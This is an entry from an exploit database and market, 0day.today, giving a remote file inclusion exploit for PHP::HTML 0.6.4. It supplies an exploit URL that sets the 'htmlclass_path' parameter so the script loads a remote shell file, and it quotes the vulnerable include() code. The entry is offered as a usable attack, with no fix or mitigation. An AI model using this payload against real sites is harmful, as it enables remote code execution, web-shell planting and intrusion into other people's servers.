[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability

Author
o0xxdark0o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1950
Category
web applications
Date add
13-06-2007
Platform
unsorted
=================================================================
PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability
=================================================================


phphtml
v 0.6.4
FOUND BY : o0xxdark0o
DOWNLOAD : http://sourceforge.net/projects/phphtml
REMOTE FILE INCLUDE
############################################################
FILE :
PATH\phphtml.php
############################################################
EXP:
xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
############################################################
CODE: on line 19
<?

define (PHPHTML_VERSION, "0.6.4");

/* gettext is not implemented for now*/
$use_gettext=0;

/* We need to know where the PHP::HTML tree is installed.*/

if (strlen(chop($htmlclass_path))==0) $htmlclass_path=".";
if ($use_gettext==1)
{
   if (function_exists("gettext"))
   {
       $gettext_enable=1;
   }
}

include("$htmlclass_path/ext.php");  /* Some extenstions to PHP */
include("$htmlclass_path/core.php");  /* PHP::HTML Core */
include("$htmlclass_path/xhtml.php");  /* XHTML extensions */
include("$htmlclass_path/xhtml_table.php");  /* XHTML tables extensions */
include("$htmlclass_path/xhtml_forms.php");  /* XHTML forms extensions */
include("$htmlclass_path/xhtml_doc.php");  /* XHTML document extension */
include("$htmlclass_path/wml.php");  /* WML extension */


/* Below is a debugging example */

/*
$t=new XHTML_doc("Hello");
echo $t->render();
*/


############################################################
thanks for all my friends .... oxdo .... cold z3ro
############################################################
BY : o0xxdark0o



#  0day.today [2024-12-26]  #